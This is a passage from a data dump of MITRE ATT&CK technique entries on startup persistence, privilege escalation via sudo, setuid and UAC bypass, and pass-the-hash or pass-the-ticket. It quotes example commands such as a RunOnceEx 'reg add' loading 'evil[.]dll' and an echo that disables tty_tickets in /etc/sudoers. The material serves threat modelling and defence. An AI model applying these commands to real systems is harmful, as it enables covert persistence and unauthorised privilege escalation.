           'platforms': ['Linux', 'macOS', 'Windows']},
 'T1547.001': {'attack_id': 'T1547.001',
               'categories': ['persistence', 'privilege-escalation'],
               'description': 'Adversaries may achieve persistence by adding a program to a startup folder or '
                              'referencing it with a Registry run key. Adding an entry to the "run keys" in the '
                              'Registry or startup folder will cause the program referenced to be executed when a user '
                              'logs in. (Citation: Microsoft Run Key) These programs will be executed under the '
                              "context of the user and will have the account's associated permissions level.\n"
                              '\n'
                              'Placing a program within a startup folder will also cause that program to execute when '
                              'a user logs in. There is a startup folder location for individual user accounts as well '
                              'as a system-wide startup folder that will be checked regardless of which user account '
                              'logs in. The startup folder path for the current user is '
                              '<code>C:\\Users\\[Username]\\AppData\\Roaming\\Microsoft\\Windows\\Start '
                              'Menu\\Programs\\Startup</code>. The startup folder path for all users is '
                              '<code>C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp</code>.\n'
                              '\n'
                              'The following run keys are created by default on Windows systems:\n'
                              '\n'
                              '* <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run</code>\n'
                              '* '
                              '<code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce</code>\n'
                              '* <code>HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run</code>\n'
                              '* '
                              '<code>HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce</code>\n'
                              '\n'
                              'Run keys may exist under multiple hives.(Citation: Microsoft Wow6432Node '
                              '2018)(Citation: Malwarebytes Wow6432Node 2016) The '
                              '<code>HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx</code> '
                              'is also available but is not created by default on Windows Vista and newer. Registry '
                              'run key entries can reference programs directly or list them as a dependency. '
                              '(Citation: Microsoft RunOnceEx APR 2018) For example, it is possible to load a DLL at '
                              'logon using a "Depend" key with RunOnceEx: <code>reg add '
                              'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /d '
                              '"C:\\temp\\evil[.]dll"</code> (Citation: Oddvar Moe RunOnceEx Mar 2018)\n'
                              '\n'
                              'The following Registry keys can be used to set startup folder items for persistence:\n'
                              '\n'
                              '* <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User '
                              'Shell Folders</code>\n'
                              '* '
                              '<code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell '
                              'Folders</code>\n'
                              '* '
                              '<code>HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell '
                              'Folders</code>\n'
                              '* '
                              '<code>HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User '
                              'Shell Folders</code>\n'
                              '\n'
                              'The following Registry keys can control automatic startup of services during boot:\n'
                              '\n'
                              '* '
                              '<code>HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce</code>\n'
                              '* '
                              '<code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce</code>\n'
                              '* '
                              '<code>HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices</code>\n'
                              '* '
                              '<code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices</code>\n'
                              '\n'
                              'Using policy settings to specify startup programs creates corresponding values in '
                              'either of two Registry keys:\n'
                              '\n'
                              '* '
                              '<code>HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run</code>\n'
                              '* '
                              '<code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run</code>\n'
                              '\n'
                              'The Winlogon key controls actions that occur when a user logs on to a computer running '
                              'Windows 7. Most of these actions are under the control of the operating system, but you '
                              'can also add custom actions here. The '
                              '<code>HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows '
                              'NT\\CurrentVersion\\Winlogon\\Userinit</code> and '
                              '<code>HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows '
                              'NT\\CurrentVersion\\Winlogon\\Shell</code> subkeys can automatically launch programs.\n'
                              '\n'
                              'Programs listed in the load value of the registry key '
                              '<code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows '
                              'NT\\CurrentVersion\\Windows</code> run when any user logs on.\n'
                              '\n'
                              'By default, the multistring <code>BootExecute</code> value of the registry key '
                              '<code>HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Session Manager</code> is '
                              'set to <code>autocheck autochk *</code>. This value causes Windows, at startup, to '
                              'check the file-system integrity of the hard disks if the system has been shut down '
                              'abnormally. Adversaries can add other programs or processes to this registry value '
                              'which will automatically launch at boot.\n'
                              '\n'
                              'Adversaries can use these configuration locations to execute malware, such as remote '
                              'access tools, to maintain persistence through system reboots. Adversaries may also use '
                              '[Masquerading](https://attack.mitre.org/techniques/T1036) to make the Registry entries '
                              'look as if they are associated with legitimate programs.',
               'name': 'Registry Run Keys / Startup Folder',
               'platforms': ['Windows']},
 'T1547.002': {'attack_id': 'T1547.002',
               'categories': ['persistence', 'privilege-escalation'],
               'description': 'Adversaries may abuse authentication packages to execute DLLs when the system boots. '
                              'Windows authentication package DLLs are loaded by the Local Security Authority (LSA) '
                              'process at system start. They provide support for multiple logon processes and multiple '
                              'security protocols to the operating system. (Citation: MSDN Authentication Packages)\n'
                              '\n'
                              'Adversaries can use the autostart mechanism provided by LSA authentication packages for '
                              'persistence by placing a reference to a binary in the Windows Registry location '
                              '<code>HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\</code> with the key value of '
                              '<code>"Authentication Packages"=&lt;target binary&gt;</code>. The binary will then be '
                              'executed by the system when the authentication packages are loaded.',
               'name': 'Authentication Package',
               'platforms': ['Windows']},
 'T1547.003': {'attack_id': 'T1547.003',
               'categories': ['persistence', 'privilege-escalation'],
               'description': 'Adversaries may abuse time providers to execute DLLs when the system boots. The Windows '
                              'Time service (W32Time) enables time synchronization across and within domains. '
                              '(Citation: Microsoft W32Time Feb 2018) W32Time time providers are responsible for '
                              'retrieving time stamps from hardware/network resources and outputting these values to '
                              'other network clients. (Citation: Microsoft TimeProvider)\n'
                              '\n'
                              'Time providers are implemented as dynamic-link libraries (DLLs) that are registered in '
                              'the subkeys of  '
                              '<code>HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Services\\W32Time\\TimeProviders\\</code>. '
                              '(Citation: Microsoft TimeProvider) The time provider manager, directed by the service '
                              'control manager, loads and starts time providers listed and enabled under this key at '
                              'system startup and/or whenever parameters are changed. (Citation: Microsoft '
                              'TimeProvider)\n'
                              '\n'
                              'Adversaries may abuse this architecture to establish persistence, specifically by '
                              'registering and enabling a malicious DLL as a time provider. Administrator privileges '
                              'are required for time provider registration, though execution will run in context of '
                              'the Local Service account. (Citation: Github W32Time Oct 2017)',
               'name': 'Time Providers',
               'platforms': ['Windows']},
 'T1547.004': {'attack_id': 'T1547.004',
               'categories': ['persistence', 'privilege-escalation'],
               'description': 'Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a '
                              'user logs in. Winlogon.exe is a Windows component responsible for actions at '
                              'logon/logoff as well as the secure attention sequence (SAS) triggered by '
                              'Ctrl-Alt-Delete. Registry entries in '
                              '<code>HKLM\\Software[\\\\Wow6432Node\\\\]\\Microsoft\\Windows '
                              'NT\\CurrentVersion\\Winlogon\\</code> and <code>HKCU\\Software\\Microsoft\\Windows '
                              'NT\\CurrentVersion\\Winlogon\\</code> are used to manage additional helper programs and '
                              'functionalities that support Winlogon. (Citation: Cylance Reg Persistence Sept 2013) \n'
                              '\n'
                              'Malicious modifications to these Registry keys may cause Winlogon to load and execute '
                              'malicious DLLs and/or executables. Specifically, the following subkeys have been known '
                              'to be possibly vulnerable to abuse: (Citation: Cylance Reg Persistence Sept 2013)\n'
                              '\n'
                              '* Winlogon\\Notify - points to notification package DLLs that handle Winlogon events\n'
                              '* Winlogon\\Userinit - points to userinit.exe, the user initialization program executed '
                              'when a user logs on\n'
                              '* Winlogon\\Shell - points to explorer.exe, the system shell executed when a user logs '
                              'on\n'
                              '\n'
                              'Adversaries may take advantage of these features to repeatedly execute malicious code '
                              'and establish persistence.',
               'name': 'Winlogon Helper DLL',
               'platforms': ['Windows']},
 'T1547.005': {'attack_id': 'T1547.005',
               'categories': ['persistence', 'privilege-escalation'],
               'description': 'Adversaries may abuse security support providers (SSPs) to execute DLLs when the system '
                              'boots. Windows SSP DLLs are loaded into the Local Security Authority (LSA) process at '
                              'system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext '
                              "passwords that are stored in Windows, such as any logged-on user's Domain password or "
                              'smart card PINs.\n'
                              '\n'
                              'The SSP configuration is stored in two Registry keys: '
                              '<code>HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Security Packages</code> and '
                              '<code>HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\OSConfig\\Security '
                              'Packages</code>. An adversary may modify these Registry keys to add new SSPs, which '
                              'will be loaded the next time the system boots, or when the AddSecurityPackage Windows '
                              'API function is called.(Citation: Graeber 2014)',
               'name': 'Security Support Provider',
               'platforms': ['Windows']},
 'T1547.006': {'attack_id': 'T1547.006',
               'categories': ['persistence', 'privilege-escalation'],
               'description': 'Adversaries may modify the kernel to automatically execute programs on system boot. '
                              'Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into '
                              'the kernel upon demand. They extend the functionality of the kernel without the need to '
                              'reboot the system. For example, one type of module is the device driver, which allows '
                              'the kernel to access hardware connected to the system. (Citation: Linux Kernel '
                              'Programming)\xa0\n'
                              '\n'
                              'When used maliciously, LKMs can be a type of kernel-mode '
                              '[Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest '
                              'operating system privilege (Ring 0). (Citation: Linux Kernel Module Programming '
                              'Guide)\xa0Common features of LKM based rootkits include: hiding itself, selective '
                              'hiding of files, processes and network activity, as well as log tampering, providing '
                              'authenticated backdoors and enabling root access to non-privileged users. (Citation: '
                              'iDefense Rootkit Overview)\n'
                              '\n'
                              'Kernel extensions, also called kext, are used for macOS to load functionality onto a '
                              'system similar to LKMs for Linux. They are loaded and unloaded through '
                              '<code>kextload</code> and <code>kextunload</code> commands.\n'
                              '\n'
                              'Adversaries can use LKMs and kexts to covertly persist on a system and elevate '
                              'privileges. Examples have been found in the wild and there are some open source '
                              'projects. (Citation: Volatility Phalanx2) (Citation: CrowdStrike Linux Rootkit) '
                              '(Citation: GitHub Reptile) (Citation: GitHub Diamorphine)(Citation: RSAC 2015 San '
                              'Francisco Patrick Wardle) (Citation: Synack Secure Kernel Extension Broken)(Citation: '
                              'Securelist Ventir) (Citation: Trend Micro Skidmap)',
               'name': 'Kernel Modules and Extensions',
               'platforms': ['macOS', 'Linux']},
 'T1547.007': {'attack_id': 'T1547.007',
               'categories': ['persistence', 'privilege-escalation'],
               'description': 'Adversaries may modify plist files to automatically run an application when a user logs '
                              'in. Starting in Mac OS X 10.7 (Lion), users can specify certain applications to be '
                              're-opened when a user logs into their machine after reboot. While this is usually done '
                              'via a Graphical User Interface (GUI) on an app-by-app basis, there are property list '
                              'files (plist) that contain this information as well located at '
                              '<code>~/Library/Preferences/com.apple.loginwindow.plist</code> and '
                              '<code>~/Library/Preferences/ByHost/com.apple.loginwindow.* .plist</code>. \n'
                              '\n'
                              'An adversary can modify one of these files directly to include a link to their '
                              'malicious executable to provide a persistence mechanism each time the user reboots '
                              'their machine (Citation: Methods of Mac Malware Persistence).',
               'name': 'Re-opened Applications',
               'platforms': ['macOS']},
 'T1547.008': {'attack_id': 'T1547.008',
               'categories': ['persistence', 'privilege-escalation'],
               'description': 'Adversaries may modify or add LSASS drivers to obtain persistence on compromised '
                              'systems. The Windows security subsystem is a set of components that manage and enforce '
                              'the security policy for a computer or domain. The Local Security Authority (LSA) is the '
                              'main component responsible for local security policy and user authentication. The LSA '
                              'includes multiple dynamic link libraries (DLLs) associated with various other security '
                              'functions, all of which run in the context of the LSA Subsystem Service (LSASS) '
                              'lsass.exe process. (Citation: Microsoft Security Subsystem)\n'
                              '\n'
                              'Adversaries may target LSASS drivers to obtain persistence. By either replacing or '
                              'adding illegitimate drivers (e.g., [Hijack Execution '
                              'Flow](https://attack.mitre.org/techniques/T1574)), an adversary can use LSA operations '
                              'to continuously execute malicious payloads.',
               'name': 'LSASS Driver',
               'platforms': ['Windows']},
 'T1547.009': {'attack_id': 'T1547.009',
               'categories': ['persistence', 'privilege-escalation'],
               'description': 'Adversaries may create or edit shortcuts to run a program during system boot or user '
                              'login. Shortcuts or symbolic links are ways of referencing other files or programs that '
                              'will be opened or executed when the shortcut is clicked or executed by a system startup '
                              'process.\n'
                              '\n'
                              'Adversaries could use shortcuts to execute their tools for persistence. They may create '
                              'a new shortcut as a means of indirection that may use '
                              '[Masquerading](https://attack.mitre.org/techniques/T1036) to look like a legitimate '
                              'program. Adversaries could also edit the target path or entirely replace an existing '
                              'shortcut so their tools will be executed instead of the intended legitimate program.',
               'name': 'Shortcut Modification',
               'platforms': ['Windows']},
 'T1547.010': {'attack_id': 'T1547.010',
               'categories': ['persistence', 'privilege-escalation'],
               'description': 'Adversaries may use port monitors to run an attacker supplied DLL during system boot '
                              'for persistence or privilege escalation. A port monitor can be set through the '
                              '<code>AddMonitor</code> API call to set a DLL to be loaded at startup. (Citation: '
                              'AddMonitor) This DLL can be located in <code>C:\\Windows\\System32</code> and will be '
                              'loaded by the print spooler service, spoolsv.exe, on boot. The spoolsv.exe process also '
                              'runs under SYSTEM level permissions. (Citation: Bloxham) Alternatively, an arbitrary '
                              'DLL can be loaded if permissions allow writing a fully-qualified pathname for that DLL '
                              'to <code>HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors</code>. \n'
                              '\n'
                              'The Registry key contains entries for the following:\n'
                              '\n'
                              '* Local Port\n'
                              '* Standard TCP/IP Port\n'
                              '* USB Monitor\n'
                              '* WSD Port\n'
                              '\n'
                              'Adversaries can use this technique to load malicious code at startup that will persist '
                              'on system reboot and execute as SYSTEM.',
               'name': 'Port Monitors',
               'platforms': ['Windows']},
 'T1547.011': {'attack_id': 'T1547.011',
               'categories': ['persistence', 'privilege-escalation'],
               'description': 'Adversaries may modify plist files to run a program during system boot or user login. '
                              'Property list (plist) files contain all of the information that macOS and OS X uses to '
                              'configure applications and services. These files are UTF-8 encoded and formatted like '
                              'XML documents via a series of keys surrounded by < >. They detail when programs should '
                              'execute, file paths to the executables, program arguments, required OS permissions, and '
                              'many others. plists are located in certain locations depending on their purpose such as '
                              '<code>/Library/Preferences</code> (which execute with elevated privileges) and '
                              "<code>~/Library/Preferences</code> (which execute with a user's privileges). \n"
                              '\n'
                              'Adversaries can modify plist files to execute their code as part of establishing '
                              'persistence. plists may also be used to elevate privileges since they may execute in '
                              'the context of another user.(Citation: Sofacy Komplex Trojan) \n'
                              '\n'
                              'A specific plist used for execution at login is '
                              '<code>com.apple.loginitems.plist</code>.(Citation: Methods of Mac Malware Persistence) '
                              "Applications under this plist run under the logged in user's context, and will be "
                              'started every time the user logs in. Login items installed using the Service Management '
                              'Framework are not visible in the System Preferences and can only be removed by the '
                              'application that created them.(Citation: Adding Login Items) Users have direct control '
                              'over login items installed using a shared file list which are also visible in System '
                              'Preferences (Citation: Adding Login Items). Some of these applications can open visible '
                              'dialogs to the user, but they don’t all have to since there is an option to "hide" the '
                              'window. If an adversary can register their own login item or modified an existing one, '
                              'then they can use it to execute their code for a persistence mechanism each time the '
                              'user logs in (Citation: Malware Persistence on OS X) (Citation: OSX.Dok Malware). The '
                              'API method <code> SMLoginItemSetEnabled</code> can be used to set Login Items, but '
                              'scripting languages like [AppleScript](https://attack.mitre.org/techniques/T1059/002) '
                              'can do this as well. (Citation: Adding Login Items)',
               'name': 'Plist Modification',
               'platforms': ['macOS']},
 'T1547.012': {'attack_id': 'T1547.012',
               'categories': ['persistence', 'privilege-escalation'],
               'description': 'Adversaries may abuse print processors to run malicious DLLs during system boot for '
                              'persistence and/or privilege escalation. Print processors are DLLs that are loaded by '
                              'the print spooler service, spoolsv.exe, during boot. \n'
                              '\n'
                              'Adversaries may abuse the print spooler service by adding print processors that load '
                              'malicious DLLs at startup. A print processor can be installed through the '
                              '<code>AddPrintProcessor</code> API call with an account that has '
                              '<code>SeLoadDriverPrivilege</code> enabled. Alternatively, a print processor can be '
                              'registered to the print spooler service by adding the '
                              '<code>HKLM\\SYSTEM\\\\[CurrentControlSet or '
                              'ControlSet001]\\Control\\Print\\Environments\\\\[Windows architecture: e.g., Windows '
                              'x64]\\Print Processors\\\\[user defined]\\Driver</code> Registry key that points to the '
                              'DLL. For the print processor to be correctly installed, it must be located in the '
                              'system print-processor directory that can be found with the '
                              '<code>GetPrintProcessorDirectory</code> API call.(Citation: Microsoft AddPrintProcessor '
                              'May 2018) After the print processors are installed, the print spooler service, which '
                              'starts during boot, must be restarted in order for them to run.(Citation: ESET PipeMon '
                              'May 2020) The print spooler service runs under SYSTEM level permissions, therefore '
                              'print processors installed by an adversary may run under elevated privileges.',
               'name': 'Print Processors',
               'platforms': ['Windows']},
 'T1548': {'attack_id': 'T1548',
           'categories': ['privilege-escalation', 'defense-evasion'],
           'description': 'Adversaries may circumvent mechanisms designed to control elevate privileges to gain '
                          'higher-level permissions. Most modern systems contain native elevation control mechanisms '
                          'that are intended to limit privileges that a user can perform on a machine. Authorization '
                          'has to be granted to specific users in order to perform tasks that can be considered of '
                          'higher risk. An adversary can perform several methods to take advantage of built-in control '
                          'mechanisms in order to escalate privileges on a system.',
           'name': 'Abuse Elevation Control Mechanism',
           'platforms': ['Linux', 'macOS', 'Windows']},
 'T1548.001': {'attack_id': 'T1548.001',
               'categories': ['privilege-escalation', 'defense-evasion'],
               'description': 'An adversary may perform shell escapes or exploit vulnerabilities in an application '
                              'with the setsuid or setgid bits to get code running in a different user’s context. On '
                              'Linux or macOS, when the setuid or setgid bits are set for an application, the '
                              'application will run with the privileges of the owning user or group respectively. '
                              '(Citation: setuid man page). Normally an application is run in the current user’s '
                              'context, regardless of which user or group owns the application. However, there are '
                              'instances where programs need to be executed in an elevated context to function '
                              'properly, but the user running them doesn’t need the elevated privileges.\n'
                              '\n'
                              'Instead of creating an entry in the sudoers file, which must be done by root, any user '
                              'can specify the setuid or setgid flag to be set for their own applications. These bits '
                              'are indicated with an "s" instead of an "x" when viewing a file\'s attributes via '
                              '<code>ls -l</code>. The <code>chmod</code> program can set these bits with via '
                              'bitmasking, <code>chmod 4777 [file]</code> or via shorthand naming, <code>chmod u+s '
                              '[file]</code>.\n'
                              '\n'
                              "Adversaries can use this mechanism on their own malware to make sure they're able to "
                              'execute in elevated contexts in the future.(Citation: OSX Keydnap malware).',
               'name': 'Setuid and Setgid',
               'platforms': ['Linux', 'macOS']},
 'T1548.002': {'attack_id': 'T1548.002',
               'categories': ['privilege-escalation', 'defense-evasion'],
               'description': 'Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows '
                              'User Account Control (UAC) allows a program to elevate its privileges (tracked as '
                              'integrity levels ranging from low to high) to perform a task under administrator-level '
                              'permissions, possibly by prompting the user for confirmation. The impact to the user '
                              'ranges from denying the operation under high enforcement to allowing the user to '
                              'perform the action if they are in the local administrators group and click through the '
                              'prompt or allowing them to enter an administrator password to complete the action. '
                              '(Citation: TechNet How UAC Works)\n'
                              '\n'
                              'If the UAC protection level of a computer is set to anything but the highest level, '
                              'certain Windows programs can elevate privileges or execute some elevated [Component '
                              'Object Model](https://attack.mitre.org/techniques/T1559/001) objects without prompting '
                              'the user through the UAC notification box. (Citation: TechNet Inside UAC) (Citation: '
                              'MSDN COM Elevation) An example of this is use of '
                              '[Rundll32](https://attack.mitre.org/techniques/T1218/011) to load a specifically '
                              'crafted DLL which loads an auto-elevated [Component Object '
                              'Model](https://attack.mitre.org/techniques/T1559/001) object and performs a file '
                              'operation in a protected directory which would typically require elevated access. '
                              'Malicious software may also be injected into a trusted process to gain elevated '
                              'privileges without prompting a user.(Citation: Davidson Windows)\n'
                              '\n'
                              'Many methods have been discovered to bypass UAC. The Github readme page for UACME '
                              'contains an extensive list of methods(Citation: Github UACMe) that have been discovered '
                              'and implemented, but may not be a comprehensive list of bypasses. Additional bypass '
                              'methods are regularly discovered and some used in the wild, such as:\n'
                              '\n'
                              '* <code>eventvwr.exe</code> can auto-elevate and execute a specified binary or '
                              'script.(Citation: enigma0x3 Fileless UAC Bypass)(Citation: Fortinet Fareit)\n'
                              '\n'
                              'Another bypass is possible through some lateral movement techniques if credentials for '
                              'an account with administrator privileges are known, since UAC is a single system '
                              'security mechanism, and the privilege or integrity of a process running on one system '
                              'will be unknown on remote systems and default to high integrity.(Citation: SANS UAC '
                              'Bypass)',
               'name': 'Bypass User Account Control',
               'platforms': ['Windows']},
 'T1548.003': {'attack_id': 'T1548.003',
               'categories': ['privilege-escalation', 'defense-evasion'],
               'description': 'Adversaries may perform sudo caching and/or use the suoders file to elevate privileges. '
                              'Adversaries may do this to execute commands as other users or spawn processes with '
                              'higher privileges.\n'
                              '\n'
                              'Within Linux and MacOS systems, sudo (sometimes referred to as "superuser do") allows '
                              'users to perform commands from terminals with elevated privileges and to control who '
                              'can perform these commands on the system. The <code>sudo</code> command "allows a '
                              'system administrator to delegate authority to give certain users (or groups of users) '
                              'the ability to run some (or all) commands as root or another user while providing an '
                              'audit trail of the commands and their arguments."(Citation: sudo man page 2018) Since '
                              'sudo was made for the system administrator, it has some useful configuration features '
                              'such as a <code>timestamp_timeout</code>, which is the amount of time in minutes '
                              'between instances of <code>sudo</code> before it will re-prompt for a password. This is '
                              'because <code>sudo</code> has the ability to cache credentials for a period of time. '
                              'Sudo creates (or touches) a file at <code>/var/db/sudo</code> with a timestamp of when '
                              'sudo was last run to determine this timeout. Additionally, there is a '
                              '<code>tty_tickets</code> variable that treats each new tty (terminal session) in '
                              'isolation. This means that, for example, the sudo timeout of one tty will not affect '
                              'another tty (you will have to type the password again).\n'
                              '\n'
                              'The sudoers file, <code>/etc/sudoers</code>, describes which users can run which '
                              'commands and from which terminals. This also describes which commands users can run as '
                              'other users or groups. This provides the principle of least privilege such that users '
                              'are running in their lowest possible permissions for most of the time and only elevate '
                              'to other users or permissions as needed, typically by prompting for a password. '
                              'However, the sudoers file can also specify when to not prompt users for passwords with '
                              'a line like <code>user1 ALL=(ALL) NOPASSWD: ALL</code> (Citation: OSX.Dok Malware). '
                              'Elevated privileges are required to edit this file though.\n'
                              '\n'
                              'Adversaries can also abuse poor configurations of these mechanisms to escalate '
                              "privileges without needing the user's password. For example, "
                              "<code>/var/db/sudo</code>'s timestamp can be monitored to see if it falls within the "
                              '<code>timestamp_timeout</code> range. If it does, then malware can execute sudo '
                              "commands without needing to supply the user's password. Additional, if "
                              '<code>tty_tickets</code> is disabled, adversaries can do this from any tty for that '
                              'user.\n'
                              '\n'
                              'In the wild, malware has disabled <code>tty_tickets</code> to potentially make '
                              "scripting easier by issuing <code>echo \\'Defaults !tty_tickets\\' >> "
                              '/etc/sudoers</code> (Citation: cybereason osx proton). In order for this change to be '
                              'reflected, the malware also issued <code>killall Terminal</code>. As of macOS Sierra, '
                              'the sudoers file has <code>tty_tickets</code> enabled by default.',
               'name': 'Sudo and Sudo Caching',
               'platforms': ['Linux', 'macOS']},
 'T1548.004': {'attack_id': 'T1548.004',
               'categories': ['privilege-escalation', 'defense-evasion'],
               'description': 'Adversaries may leverage the <code>AuthorizationExecuteWithPrivileges</code> API to '
                              'escalate privileges by prompting the user for credentials.(Citation: AppleDocs '
                              'AuthorizationExecuteWithPrivileges) The purpose of this API is to give application '
                              'developers an easy way to perform operations with root privileges, such as for '
                              'application installation or updating. This API does not validate that the program '
                              'requesting root privileges comes from a reputable source or has been maliciously '
                              'modified. \n'
                              '\n'
                              'Although this API is deprecated, it still fully functions in the latest releases of '
                              'macOS. When calling this API, the user will be prompted to enter their credentials but '
                              'no checks on the origin or integrity of the program are made. The program calling the '
                              'API may also load world writable files which can be modified to perform malicious '
                              'behavior with elevated privileges.\n'
                              '\n'
                              'Adversaries may abuse <code>AuthorizationExecuteWithPrivileges</code> to obtain root '
                              'privileges in order to install malicious software on victims and install persistence '
                              "mechanisms.(Citation: Death by 1000 installers; it's all broken!)(Citation: Carbon "
                              'Black Shlayer Feb 2019)(Citation: OSX Coldroot RAT) This technique may be combined with '
                              '[Masquerading](https://attack.mitre.org/techniques/T1036) to trick the user into '
                              'granting escalated privileges to malicious code.(Citation: Death by 1000 installers; '
                              "it's all broken!)(Citation: Carbon Black Shlayer Feb 2019) This technique has also been "
                              'shown to work by modifying legitimate programs present on the machine that make use of '
                              "this API.(Citation: Death by 1000 installers; it's all broken!)",
               'name': 'Elevated Execution with Prompt',
               'platforms': ['macOS']},
 'T1550': {'attack_id': 'T1550',
           'categories': ['defense-evasion', 'lateral-movement'],
           'description': 'Adversaries may use alternate authentication material, such as password hashes, Kerberos '
                          'tickets, and application access tokens, in order to move laterally within an environment '
                          'and bypass normal system access controls. \n'
                          '\n'
                          'Authentication processes generally require a valid identity (e.g., username) along with one '
                          'or more authentication factors (e.g., password, pin, physical smart card, token generator, '
                          'etc.). Alternate authentication material is legitimately generated by systems after a user '
                          'or application successfully authenticates by providing a valid identity and the required '
                          'authentication factor(s). Alternate authentication material may also be generated during '
                          'the identity creation process.(Citation: NIST Authentication)(Citation: NIST MFA)\n'
                          '\n'
                          'Caching alternate authentication material allows the system to verify an identity has '
                          'successfully authenticated without asking the user to reenter authentication factor(s). '
                          'Because the alternate authentication must be maintained by the system—either in memory or '
                          'on disk—it may be at risk of being stolen through [Credential '
                          'Access](https://attack.mitre.org/tactics/TA0006) techniques. By stealing alternate '
                          'authentication material, adversaries are able to bypass system access controls and '
                          'authenticate to systems without knowing the plaintext password or any additional '
                          'authentication factors.\n',
           'name': 'Use Alternate Authentication Material',
           'platforms': ['Windows', 'Office 365', 'SaaS']},
 'T1550.001': {'attack_id': 'T1550.001',
               'categories': ['defense-evasion', 'lateral-movement'],
               'description': 'Adversaries may use stolen application access tokens to bypass the typical '
                              'authentication process and access restricted accounts, information, or services on '
                              'remote systems. These tokens are typically stolen from users and used in lieu of login '
                              'credentials.\n'
                              '\n'
                              'Application access tokens are used to make authorized API requests on behalf of a user '
                              'and are commonly used as a way to access resources in cloud-based applications and '
                              'software-as-a-service (SaaS).(Citation: Auth0 - Why You Should Always Use Access Tokens '
                              'to Secure APIs Sept 2019) OAuth is one commonly implemented framework that issues '
                              'tokens to users for access to systems. These frameworks are used collaboratively to '
                              'verify the user and determine what actions the user is allowed to perform. Once '
                              'identity is established, the token allows actions to be authorized, without passing the '
                              'actual credentials of the user. Therefore, compromise of the token can grant the '
                              'adversary access to resources of other sites through a malicious application.(Citation: '
                              'okta)\n'
                              '\n'
                              'For example, with a cloud-based email service once an OAuth access token is granted to '
                              'a malicious application, it can potentially gain long-term access to features of the '
                              'user account if a "refresh" token enabling background access is awarded.(Citation: '
                              'Microsoft Identity Platform Access 2019) With an OAuth access token an adversary can '
                              'use the user-granted REST API to perform functions such as email searching and contact '
                              'enumeration.(Citation: Staaldraad Phishing with OAuth 2017)\n'
                              '\n'
                              'Compromised access tokens may be used as an initial step in compromising other '
                              'services. For example, if a token grants access to a victim’s primary email, the '
                              'adversary may be able to extend access to all other services which the target '
                              'subscribes by triggering forgotten password routines. Direct API access through a token '
                              'negates the effectiveness of a second authentication factor and may be immune to '
                              'intuitive countermeasures like changing passwords. Access abuse over an API channel can '
                              'be difficult to detect even from the service provider end, as the access can still '
                              'align well with a legitimate workflow.',
               'name': 'Application Access Token',
               'platforms': ['Office 365', 'SaaS']},
 'T1550.002': {'attack_id': 'T1550.002',
               'categories': ['defense-evasion', 'lateral-movement'],
               'description': 'Adversaries may “pass the hash” using stolen password hashes to move laterally within '
                              'an environment, bypassing normal system access controls. Pass the hash (PtH) is a '
                              "method of authenticating as a user without having access to the user's cleartext "
                              'password. This method bypasses standard authentication steps that require a cleartext '
                              'password, moving directly into the portion of the authentication that uses the password '
                              'hash. In this technique, valid password hashes for the account being used are captured '
                              'using a Credential Access technique. Captured hashes are used with PtH to authenticate '
                              'as that user. Once authenticated, PtH may be used to perform actions on local or remote '
                              'systems.\n'
                              '\n'
                              'Windows 7 and higher with KB2871997 require valid domain user credentials or RID 500 '
                              'administrator hashes.(Citation: NSA Spotting)',
               'name': 'Pass the Hash',
               'platforms': ['Windows']},
 'T1550.003': {'attack_id': 'T1550.003',
               'categories': ['defense-evasion', 'lateral-movement'],
               'description': 'Adversaries may “pass the ticket” using stolen Kerberos tickets to move laterally '
                              'within an environment, bypassing normal system access controls. Pass the ticket (PtT) '
                              'is a method of authenticating to a system using Kerberos tickets without having access '
                              "to an account's password. Kerberos authentication can be used as the first step to "
                              'lateral movement to a remote system.\n'
                              '\n'
                              'In this technique, valid Kerberos tickets for [Valid '
                              'Accounts](https://attack.mitre.org/techniques/T1078) are captured by [OS Credential '
                              "Dumping](https://attack.mitre.org/techniques/T1003). A user's service tickets or ticket "
                              'granting ticket (TGT) may be obtained, depending on the level of access. A service '
                              'ticket allows for access to a particular resource, whereas a TGT can be used to request '
                              'service tickets from the Ticket Granting Service (TGS) to access any resource the user '
                              'has privileges to access.(Citation: ADSecurity AD Kerberos Attacks)(Citation: '
                              'GentilKiwi Pass the Ticket)\n'
                              '\n'
